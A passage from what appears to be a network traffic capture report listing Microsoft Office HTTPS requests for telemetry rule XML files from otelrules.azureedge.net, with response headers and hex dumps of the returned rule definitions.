                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        136192.168.2.44989413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:18 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:19 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:19 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1403
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                        ETag: "0x8DC582BEB866CDB"
                                                                        x-ms-request-id: 6361a643-501e-0047-3bd4-43ce6c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165119Z-174f7845968pf68xhC1EWRr4h800000016gg0000000068ra
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:19 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        137192.168.2.44989613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:18 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:19 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:19 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1399
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                        ETag: "0x8DC582BE976026E"
                                                                        x-ms-request-id: ff1e1338-c01e-00a2-7ff2-442327000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165119Z-174f7845968cs2nkhC1EWR2tq000000001t000000000usb7
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:19 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        138192.168.2.44989713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:19 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:19 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:19 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1362
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                        x-ms-request-id: 3201b34b-401e-000a-7601-454a7b000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165119Z-174f7845968nxc96hC1EWRspw800000015x000000000ku01
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:19 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        139192.168.2.44989813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:19 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:19 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:19 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1425
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                        x-ms-request-id: 1318377f-c01e-0034-12b7-432af6000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165119Z-174f7845968n2hr8hC1EWR9cag00000015sg00000000s2nb
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:19 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        140192.168.2.44990013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:21 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:21 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:21 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1415
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                        ETag: "0x8DC582BE7C66E85"
                                                                        x-ms-request-id: 44412a51-001e-000b-14c5-4315a7000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165121Z-174f7845968glpgnhC1EWR7uec00000016d0000000008c29
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:21 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        141192.168.2.44989913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:21 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:21 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:21 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1388
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                        ETag: "0x8DC582BDBD9126E"
                                                                        x-ms-request-id: 896bdb60-701e-0001-04ee-44b110000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165121Z-174f7845968cs2nkhC1EWR2tq000000001vg00000000h2h9
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:21 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        142192.168.2.44990113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:21 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:21 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:21 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1378
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                        ETag: "0x8DC582BDB813B3F"
                                                                        x-ms-request-id: 5818dd1d-501e-0035-4638-40c923000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165121Z-174f7845968jrjrxhC1EWRmmrs00000016ag00000000evmn
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:21 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        143192.168.2.44990213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:21 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:21 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:21 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1405
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                        ETag: "0x8DC582BE89A8F82"
                                                                        x-ms-request-id: de3e9c2e-601e-0084-79fe-446b3f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165121Z-174f7845968ljs8phC1EWRe6en000000164g0000000037ny
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:21 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        144192.168.2.44990313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:21 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:21 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:21 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1368
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                        x-ms-request-id: 88a8555b-701e-003e-7bfe-4479b3000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165121Z-174f7845968kvnqxhC1EWRmf3g0000000t0g00000000cgpm
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:21 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        145192.168.2.44990513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:23 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:23 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:23 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1378
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                        ETag: "0x8DC582BE584C214"
                                                                        x-ms-request-id: 22aebb4e-401e-00ac-1f80-430a97000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165123Z-174f7845968cpnpfhC1EWR3afc00000015rg00000000rhhr
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:23 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        146192.168.2.44990413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:23 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:23 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:23 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1415
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                        ETag: "0x8DC582BDCE9703A"
                                                                        x-ms-request-id: fa88f089-201e-003f-24a9-426d94000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165123Z-174f7845968xr5c2hC1EWRd0hn0000000qyg00000000sh14
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
